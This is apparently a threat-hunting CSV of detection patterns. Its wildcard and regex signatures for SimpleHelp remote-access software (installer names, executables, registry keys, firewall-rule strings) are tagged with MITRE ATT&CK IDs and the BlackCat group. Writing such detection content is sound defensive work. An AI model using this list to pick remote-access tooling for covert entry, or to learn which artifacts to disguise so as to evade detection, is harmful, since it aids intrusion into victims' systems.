"*\SimpleHelp.RemoteWork.127_0_0_1*",".{0,1000}\\SimpleHelp\.RemoteWork\.127_0_0_1.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\SimpleHelp.Technician.127_0_0_1*",".{0,1000}\\SimpleHelp\.Technician\.127_0_0_1.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\simplehelper64.exe*",".{0,1000}\\simplehelper64\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\simplehelp-rw\shell*",".{0,1000}\\simplehelp\-rw\\shell.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\simplehelpuninstall.exe*",".{0,1000}\\simplehelpuninstall\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\SimpleService.exe*",".{0,1000}\\SimpleService\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\StopSimpleGatewayService.exe*",".{0,1000}\\StopSimpleGatewayService\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\winpty-agent64.exe*",".{0,1000}\\winpty\-agent64\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>SimpleHelp Ltd<*",".{0,1000}\>SimpleHelp\sLtd\<.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","#companyname","N/A","10","10","N/A","N/A","N/A","N/A"
"*bin\Remote AccessLauncher.exe*",".{0,1000}bin\\Remote\sAccessLauncher\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Elevate*\elev_win.exe*",".{0,1000}Elevate.{0,1000}\\elev_win\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*firewall add rule ""name=SH Remote Access Service Launcher""*",".{0,1000}firewall\sadd\srule\s\""name\=SH\sRemote\sAccess\sService\sLauncher\"".{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*firewall add rule ""name=SH Remote Access Service Updater""*",".{0,1000}firewall\sadd\srule\s\""name\=SH\sRemote\sAccess\sService\sUpdater\"".{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*firewall add rule ""name=SH Remote Access Service""*",".{0,1000}firewall\sadd\srule\s\""name\=SH\sRemote\sAccess\sService\"".{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Manage Remote Access Service.exe*",".{0,1000}Manage\sRemote\sAccess\sService\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Program Files\SimpleHelp*",".{0,1000}Program\sFiles\\SimpleHelp.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ProgramData\JWrapper-Remote Access\*.exe*",".{0,1000}ProgramData\\JWrapper\-Remote\sAccess\\.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote AccessECompatibility.exe*",".{0,1000}Remote\sAccessECompatibility\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Access-linux32arm-offline.tar*",".{0,1000}Remote\sAccess\-linux32arm\-offline\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Access-linux32arm-online.tar*",".{0,1000}Remote\sAccess\-linux32arm\-online\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Access-linux32-offline.tar*",".{0,1000}Remote\sAccess\-linux32\-offline\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Access-linux32-online.tar*",".{0,1000}Remote\sAccess\-linux32\-online\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Access-linux64arm-offline.tar*",".{0,1000}Remote\sAccess\-linux64arm\-offline\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Access-linux64arm-online.tar*",".{0,1000}Remote\sAccess\-linux64arm\-online\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Access-linux64-offline.tar*",".{0,1000}Remote\sAccess\-linux64\-offline\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Access-linux64-online.tar*",".{0,1000}Remote\sAccess\-linux64\-online\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Access-macos-intel-offline.dmg*",".{0,1000}Remote\sAccess\-macos\-intel\-offline\.dmg.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Access-macos-intel-online.dmg*",".{0,1000}Remote\sAccess\-macos\-intel\-online\.dmg.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Access-macos-offline.dmg*",".{0,1000}Remote\sAccess\-macos\-offline\.dmg.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Access-macos-online.dmg*",".{0,1000}Remote\sAccess\-macos\-online\.dmg.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Access-windows32-offline.exe*",".{0,1000}Remote\sAccess\-windows32\-offline\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Access-windows32-online.exe*",".{0,1000}Remote\sAccess\-windows32\-online\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Access-windows64-offline.exe*",".{0,1000}Remote\sAccess\-windows64\-offline\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*remote access-windows64-online.exe*",".{0,1000}remote\saccess\-windows64\-online\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Access-windows64-online.exe*",".{0,1000}Remote\sAccess\-windows64\-online\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Support-java-online.jar*",".{0,1000}Remote\sSupport\-java\-online\.jar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Support-linux32arm-offline.tar*",".{0,1000}Remote\sSupport\-linux32arm\-offline\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Support-linux32arm-online.tar*",".{0,1000}Remote\sSupport\-linux32arm\-online\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Support-linux32-offline.tar*",".{0,1000}Remote\sSupport\-linux32\-offline\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Support-linux32-online.tar*",".{0,1000}Remote\sSupport\-linux32\-online\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Support-linux64arm-offline.tar*",".{0,1000}Remote\sSupport\-linux64arm\-offline\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Support-linux64arm-online.tar*",".{0,1000}Remote\sSupport\-linux64arm\-online\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Support-linux64-offline.tar*",".{0,1000}Remote\sSupport\-linux64\-offline\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Support-linux64-online.tar*",".{0,1000}Remote\sSupport\-linux64\-online\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Support-macos-intel-offline.dmg*",".{0,1000}Remote\sSupport\-macos\-intel\-offline\.dmg.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Support-macos-intel-online.dmg*",".{0,1000}Remote\sSupport\-macos\-intel\-online\.dmg.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Support-macos-offline.dmg*",".{0,1000}Remote\sSupport\-macos\-offline\.dmg.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Support-macos-online.dmg*",".{0,1000}Remote\sSupport\-macos\-online\.dmg.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Support-windows32-offline.exe*",".{0,1000}Remote\sSupport\-windows32\-offline\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Support-windows32-online.exe*",".{0,1000}Remote\sSupport\-windows32\-online\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Support-windows64-offline.exe*",".{0,1000}Remote\sSupport\-windows64\-offline\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*remote support-windows64-online.exe*",".{0,1000}remote\ssupport\-windows64\-online\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Support-windows64-online.exe*",".{0,1000}Remote\sSupport\-windows64\-online\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*remote work-windows64-online.exe*",".{0,1000}remote\swork\-windows64\-online\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Work-windows64-online.exe*",".{0,1000}Remote\sWork\-windows64\-online\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SimpleHelp - simple-help.com*",".{0,1000}SimpleHelp\s\-\ssimple\-help\.com.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*simplehelp remote work.exe*",".{0,1000}simplehelp\sremote\swork\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*simplehelp remote workwinlauncher.exe*",".{0,1000}simplehelp\sremote\sworkwinlauncher\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SimpleHelp Remote WorkWinLauncher.exe*",".{0,1000}SimpleHelp\sRemote\sWorkWinLauncher\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SimpleHelp Technician.exe*",".{0,1000}SimpleHelp\sTechnician\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*simplehelp technician.exe*",".{0,1000}simplehelp\stechnician\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SimpleHelp Technician-java-online.jar*",".{0,1000}SimpleHelp\sTechnician\-java\-online\.jar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SimpleHelp Technician-linux32arm-offline.tar*",".{0,1000}SimpleHelp\sTechnician\-linux32arm\-offline\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SimpleHelp Technician-linux32arm-online.tar*",".{0,1000}SimpleHelp\sTechnician\-linux32arm\-online\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SimpleHelp Technician-linux32-offline.tar*",".{0,1000}SimpleHelp\sTechnician\-linux32\-offline\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SimpleHelp Technician-linux32-online.tar*",".{0,1000}SimpleHelp\sTechnician\-linux32\-online\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SimpleHelp Technician-linux64arm-offline.tar*",".{0,1000}SimpleHelp\sTechnician\-linux64arm\-offline\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SimpleHelp Technician-linux64arm-online.tar*",".{0,1000}SimpleHelp\sTechnician\-linux64arm\-online\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SimpleHelp Technician-linux64-offline.tar*",".{0,1000}SimpleHelp\sTechnician\-linux64\-offline\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SimpleHelp Technician-linux64-online.tar*",".{0,1000}SimpleHelp\sTechnician\-linux64\-online\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SimpleHelp Technician-macos-intel-offline.dmg*",".{0,1000}SimpleHelp\sTechnician\-macos\-intel\-offline\.dmg.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SimpleHelp Technician-macos-intel-online.dmg*",".{0,1000}SimpleHelp\sTechnician\-macos\-intel\-online\.dmg.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SimpleHelp Technician-macos-offline.dmg*",".{0,1000}SimpleHelp\sTechnician\-macos\-offline\.dmg.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SimpleHelp Technician-macos-online.dmg*",".{0,1000}SimpleHelp\sTechnician\-macos\-online\.dmg.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SimpleHelp Technician-windows32-offline.exe*",".{0,1000}SimpleHelp\sTechnician\-windows32\-offline\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
